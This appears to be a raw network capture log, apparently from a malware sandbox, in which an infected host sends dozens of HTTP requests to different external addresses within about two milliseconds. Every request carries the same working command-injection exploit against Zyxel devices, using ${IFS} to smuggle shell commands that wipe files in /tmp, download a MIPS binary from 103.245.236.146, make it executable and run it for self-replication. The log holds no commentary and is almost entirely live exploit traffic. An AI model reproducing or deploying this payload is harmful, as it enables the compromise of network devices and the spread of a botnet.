                                                Jan 28, 2024 10:16:21.758733034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3493192.168.2.2357052187.130.132.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758744001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3494192.168.2.234095480.88.114.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758779049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3495192.168.2.2338660198.36.18.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758788109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3496192.168.2.23429644.22.220.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758836031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3497192.168.2.235851679.30.223.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758845091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3498192.168.2.2340982174.251.198.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758872032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3499192.168.2.235281459.131.234.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758888006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3500192.168.2.2340396206.143.67.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758920908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3501192.168.2.2345668124.85.83.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758966923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3502192.168.2.235060691.168.198.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.758977890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3503192.168.2.234288295.54.8.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759017944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3504192.168.2.235506683.157.134.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759043932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3505192.168.2.233361071.250.139.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759067059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3506192.168.2.2355150115.166.14.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759092093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3507192.168.2.2359264128.0.55.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759119987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3508192.168.2.233625486.185.192.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759155035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3509192.168.2.234009873.31.162.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759181023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3510192.168.2.2354042222.199.54.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759196043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3511192.168.2.2335852145.96.98.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759224892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3512192.168.2.2343552179.185.19.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759247065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3513192.168.2.235625454.221.135.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759277105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3514192.168.2.2342080152.35.103.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759296894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3515192.168.2.2357928195.130.70.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759304047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3516192.168.2.234942487.65.111.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759349108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3517192.168.2.235448267.246.64.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759361982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3518192.168.2.23487204.122.199.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759390116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3519192.168.2.235129097.144.170.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759411097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3520192.168.2.23451064.96.152.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759440899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3521192.168.2.233481074.240.252.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759471893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3522192.168.2.2346946147.187.29.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759471893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3523192.168.2.2347782110.245.233.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759494066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3524192.168.2.2344038160.67.36.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759520054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3525192.168.2.235796225.167.86.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759557962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3526192.168.2.235574073.96.95.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759567976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3527192.168.2.2337270191.39.62.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759571075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3528192.168.2.2357910117.141.12.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759618044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3529192.168.2.233951462.77.203.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759644985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3530192.168.2.2348152150.213.45.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759692907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3531192.168.2.2338808196.252.122.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759692907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3532192.168.2.235687038.66.68.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759716988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3533192.168.2.23557009.14.183.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759738922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3534192.168.2.2336636107.172.29.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759763002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3535192.168.2.2344494104.102.255.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759814978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3536192.168.2.2342340151.16.30.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759844065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3537192.168.2.235092817.143.207.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759870052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3538192.168.2.2352054141.218.176.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759902000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3539192.168.2.234122671.89.213.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759932041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3540192.168.2.234250660.9.172.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759968996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3541192.168.2.2335634164.29.55.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.759983063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3542192.168.2.2342666120.96.217.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760004044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3543192.168.2.2353904119.212.21.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760041952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3544192.168.2.235683042.89.216.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760051966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3545192.168.2.2345496202.151.82.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760098934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3546192.168.2.236019823.95.101.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760106087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3547192.168.2.234845850.153.52.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760140896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3548192.168.2.233656496.52.1.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760147095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3549192.168.2.235040090.106.46.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760162115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3550192.168.2.234456031.7.124.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760216951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3551192.168.2.2336328105.101.157.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760241032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3552192.168.2.233549843.50.3.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760278940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3553192.168.2.235584281.208.19.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:21.760324001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3554192.168.2.2353872126.150.30.118443
                                                TimestampBytes transferredDirectionData
